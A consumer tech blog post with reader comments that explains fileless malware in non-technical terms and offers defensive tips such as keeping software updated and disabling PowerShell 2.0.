Fileless Malware: The Ghost in Your Computer
A clever but pernicious software technique that's been known for more than a decade is being adopted by today's malware authors, complicating the work of anti-virus developers and digital forensic analysts. Tracking down so-called “fileless malware” is to detection of regular malware what ghost-hunting is to catching a garden-variety burglar. Read on to learn about this resurgent threat and what you can do to stop it... |
What is Fileless Malware?
Traditional malware consists of one or more files stored on a hard disk. At least one of these files must be executable, and the malware cannot do any harm until that file is executed. Fileless malware, in contrast, resides in RAM memory and is never written to your hard drive as a file. Then there is semi-fileless malware, with some seemingly harmless parts written to disk while the main executable portions remain in RAM or even on a remote server.
Files leave traces as they are read or written to disk. A file has a pattern that can be reduced to a static signature that can be compared to known signatures in antivirus databases. These and other traits of files make it easier to figure out where a file-based malware package came from and what it is.
Instead of tricking the user to download and run an executable file, fileless malware uses legitimate, trusted tools that are part of the operating system to do its dirty work. That means there are no “suspicious” programs on the hard drive, or active in memory. Just the “ghost” lurking in system memory space.
Fileless malware is fluid. Like water poured into different jars full of pebbles, it perfectly fits itself into unused gaps in RAM, all linked together by beginning and ending memory addresses. Traditional antivirus software looks in vain for the wrong thing – a signature – and in the wrong place – the hard disk – ignoring what is in main memory.
Fileless attacks are said to be ten times more likely to succeed than file-based attacks. Fileless malware played a role in the devastating Equifax breach that exposed the personal information of over 100 million consumers. But effective anti-malware also detects the shapeshifting ghost of fileless malware. It identifies suspicious areas of RAM by analyzing traffic that flows between them. Having identified the outline of a ghost, the anti-malware zeroes in on that outline to monitor what crosses it. What the ghost does becomes the important thing, not what it is.
Does the ghost call PowerShell? If so, that call may be blocked until the reason PowerShell is called has been discovered and authorized. Does the ghost send data out to the Internet? To whom and why must be known before that is allowed. All of this learning and blocking must be done instantly, lest some suspicious activity slip past. So effective anti-malware, like fileless malware, must reside in RAM. This requirement constrains how much the ghost-hunting function can do, and how adversely the ghost-hunter affects overall system performance.
Digging Deeper
Fileless malware poses many other challenges for the good guys. I hope these examples give you some appreciation for the prowess of anti-malware developers who keep us safe from much of this nasty stuff, if not all of it. MalwareBytes’ Vasilios Hioureas covers fileless malware in excruciating geekly detail in an ongoing series of articles that begins here.
To be honest, even after reading these highly technical articles, I was still a bit confused about exactly how fileless malware actually sneaks into a computer. Suffice it to say that under the right conditions, some combination of unpatched vulnerabilities, a zero-day exploit, a compromised website, a careless click on an email link, an infected document (or perhaps a fragment of an underdone potato) can trigger a fileless malware attack. Malicious instructions are then sent to a legitimate program, which dutifully executes the attack.
Traditional anti-virus programs that rely on file-based scanning will not stop these attacks. Avast, Avira and Bitdefender do claim to protect against this threat, but I had to dig deep to find it on their websites. MalwareBytes has done a lot of research on this type of malware and seems to understand mitigation strategies well.
PC-Matic, my preferred anti-malware tool, differentiates itself by focusing on emerging polymorphic threats and fileless ransomware detection. If you missed it, see my review: PC Matic 4.0 – My Review.
It's important to keep yourself aware of emerging threats and take action where you can to protect yourself, your computer, and your important data. Keeping your operating system, application software and anti-malware defenses updated is an important first step. (See Here's Why You Must Keep Your Software Updated and how to do it for free.)
And since some of these fileless malware attacks rely on Windows PowerShell, I recommend disabling that as well. To do so, follow these steps:
- Type windows features in the Windows 10/11 search box, and press ENTER.
- Scroll down to the Windows PowerShell 2.0 line item
- Uncheck the box next to it, and click OK
- Wait for the prompt to restart your computer.
Have you been affected by fileless malware, or has your security tool detected an instance of it? Your thoughts on this topic are welcome. Post your comment or question below.
|
|
This article was posted by Bob Rankin on 30 Mar 2023
For Fun: Buy Bob a Snickers. |
Prev Article: Geekly Update - 29 March 2023 (Are we doomed?) |
The Top Twenty |
Next Article: REVEALED: How Creepy Marketers Get Your Email Address |
Post your Comments, Questions or Suggestions
Free Tech Support -- Ask Bob Rankin Subscribe to AskBobRankin Updates: Free Newsletter Copyright © 2005 - Bob Rankin - All Rights Reserved About Us Privacy Policy RSS/XML |
Article information: AskBobRankin -- Fileless Malware: The Ghost in Your Computer (Posted: 30 Mar 2023)
Source: https://askbobrankin.com/fileless_malware_the_ghost_in_your_computer.html
Copyright © 2005 - Bob Rankin - All Rights Reserved
Most recent comments on "Fileless Malware: The Ghost in Your Computer"
Posted by:
The 146%
30 Mar 2023
So if this actually happens to your PC.....
....."Who you gonna call?"
Posted by:
Steve
30 Mar 2023
I still use W7 & there doesn't appear to be a Windows Powershell 2.0 option to switch off ?
Posted by:
Bob S
30 Mar 2023
Is there any downside of turning off Powershell?
Posted by:
John
30 Mar 2023
I agree with Bob S. I hesitate to do anything that may have unintended consequences.
Posted by:
cho
30 Mar 2023
actually I believe it is not really "fileless" it is just not a resident file. the intruding file information is transient. It is introduced at the time of execution from an external source, such as email attachment or web page content as the user fetches it from online. The file is only briefly on the storage medium of your computer, but is a file nevertheless.
Posted by:
Bob K
31 Mar 2023
How does this work for us users of Linux? Can the thing that got installed in RAM in a Windows machine be able to be installed under Linux? And, if so, can it still do damage?
Posted by:
Oldster
31 Mar 2023
I use Windows Security as my primary antimalware suit. It includes a feature named Memory Integrity, which prevents attacks from inserting malicious code into high-security processes (per the Windows Security description). I have the free version of Malwarebytes installed (it scans memory as part of the scan), and I scan my computer on the first day of each month as one of my System/Security Maintenance routines. I am very cautious/skeptical of anything coming from the Internet (such as website or email message links). Before I click a link, I check to see where it will take me. If I have any doubts (or I cannot identify the URL), I don't click.
The single most important thing anyone can do to avoid malware of any kind is to employ Cognitive Security which involves developing safe web browsing practices combined with a very skeptical attitude toward anything a user may encounter on the Internet. For most links, you can hover your mouse over it to see the URL. If not - red flag - try copying the link and pasting it into a text editor window. If you have any doubts about the validity of the link, try performing a who-is Internet search with your web browser ( search for "who is", then use the URL you pasted into the text editor window in the who is web site to learn whatever you can about it. If you are not familiar with the who is service, use links like the URL to askbobrankin.com, and google.com to experiment. You should get a feel for what to expect.
The bottom line is, if you have any doubts about a link, don't click it! If you have any doubts about a URL, don't use it! This same skepticism about anything you find (see, hear, etc.) on the Internet. If you cannot confirm its validity, don't believe it until you can, especially if it reinforces or enhances your current beliefs because you cannot know the author's agenda/motivation. A user with a healthy level of skepticism questions everything, then picks and chooses what (s)he believes after careful research.
My2Cents, I hope it helps others,
Ernie
Posted by:
Gilles Lalancette
31 Mar 2023
Thanks for the info. I did turn off Power Shell following your directions.
I have been a reader of your chronicle for many years and I appreciate it very much.
Again, thank you for your knowledgeable help.
Posted by:
gene
31 Mar 2023
I've had Malwarebytes Pro for many years, got a lifetime subscription for $25 back when they were still pretty new. Transferable license to any new pc I buy, so that is always on, always running. Have never had a virus or piece of malware make it to my system. I do have Windows Defender running at the same time, they work well together, not always the case with various programs. But, imo, Malwarebytes is still the gold standard and it's good to hear they're aware of this.
Posted by:
Sandy Jankowski
31 Mar 2023
1/ YOUR ADVICE: 'windows features' does not show anything regarding PowerShell
2/ MALW2AREBYTES;
running it: "Unable to connect the Service"
Trying to uninstall MB: "We encountered a problem during uninstall. Please download the Malware Support Tool or contact Malwarebytes Support for help."
Running the tool: "Unable to connect the Service"
h e l p !
Posted by:
Karen
24 Apr 2023
What are the disadvantages of turning off Powershell and will I ever need to turn it back on for something?